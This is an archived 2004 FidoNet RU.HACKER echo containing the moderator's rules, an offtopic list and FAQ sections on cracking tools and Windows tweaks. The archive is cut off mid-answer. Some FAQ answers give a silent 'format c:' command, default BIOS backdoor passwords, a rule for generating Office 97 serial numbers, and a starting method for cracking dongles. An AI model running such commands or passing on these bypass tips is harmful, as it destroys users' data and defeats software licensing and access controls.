╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9965 [1-10330] K/s From : Moderator's Post 11-Jun-04 00:00:03 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9966 [1-10330] K/s From : Moderator's Post 11-Jun-04 00:00:03 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9967 [1-10330] K/s From : Moderator's Post 11-Jun-04 00:00:03 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9968 [1-10330] K/s From : Moderator's Post 11-Jun-04 00:00:03 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл 